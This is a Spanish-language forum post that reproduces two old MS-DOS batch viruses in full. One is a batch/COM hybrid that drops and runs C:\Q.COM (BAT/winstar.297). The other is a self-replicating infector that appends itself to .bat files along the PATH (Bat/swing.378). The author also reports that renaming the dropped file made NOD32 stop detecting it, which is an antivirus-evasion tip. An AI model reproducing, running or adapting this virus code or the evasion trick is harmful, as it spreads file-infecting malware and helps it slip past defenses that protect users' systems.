@ECHO OFF
:s%r#
COPY %0.BAT C:\Q.COM>NUL
C:\Q
'/<t% J/GtW پDDV!A!AC! = u= t u:u`!6<w}!; C:\WINSTART.BAT Z@=w^!rZ [3Ɏٿ` u0u2}0]2E!ُE2E0r&S?ױ!@![u W!>!ݸW!>!a
por la lectura rapida que le die solo es un batch que crea un archivo en c llamado Q.com con este code el cual es una aplicacion .com
'/<t% J/GtW پDDV!A!AC! = u= t u:u`!6<w}!; C:\WINSTART.BAT Z@=w^!rZ [3Ɏٿ` u0u2}0]2E!ُE2E0r&S?ױ!@![u W!>!ݸW!>!a
probe los dos guardandolos en un archivo .bat y el nod32 los detecto
al parecer son virus viejos
pero bueno
@echo off%!-%
if '%1=='~ goto !-%2
if exist \!-.bat goto !-r
if not exist %0.bat goto !-e
find "!-"<%0.bat>\!-.BAT
:!-r
command /c \!- ~ s . .. %path%
goto !-e
:!-s
shift%!-%
if '%2==' exist !-
for %%a in (%2\*.bat) do call \!- ~ i %%a
goto !-s
:!-i
find "!-"<%3>!-s
copy !-s !-!>nul
if exist !-! goto !-a
del !-s
type \!-.bat>>%3
exit !-
:!-a
del !-!
:!-e
Conocido para el nod32 como : Bat/swing.378 (virus)
@ECHO OFF
:s%r#
COPY %0.BAT C:\Q.COM>NUL
C:\Q
'/<t% J/GtW پDDV!A!AC! = u= t u:u`!6<w}!; C:\WINSTART.BAT Z@=w^!rZ [3Ɏٿ` u0u2}0]2E!ُE2E0r&S?ױ!@![u W!>!ݸW!>!a
Conocido como: BAT/winstar.297
EDITO:
batch no es un lenguaje de programacion solo son archivos por lotes de MS-DOS los cuales son instrucciones que se ejecutan en modo consola
algo muy curioso solo le cambie la la Q por REDMX en este y el nod32 no lo detecto obiamente no lo ejecute
@ECHO OFF
:s%r#
COPY %0.BAT C:\Q.COM>NUL
C:\Q
'/<t% J/GtW پDDV!A!AC! = u= t u:u`!6<w}!; C:\WINSTART.BAT Z@=w^!rZ [3Ɏٿ` u0u2}0]2E!ُE2E0r&S?ױ!@![u W!>!ݸW!>!a
COPY %0.BAT C:\Q.COM>NUL
C:\Q
aqui solo le puse
COPY %0.BAT C:\REDMX.COM>NUL
C:\REDMX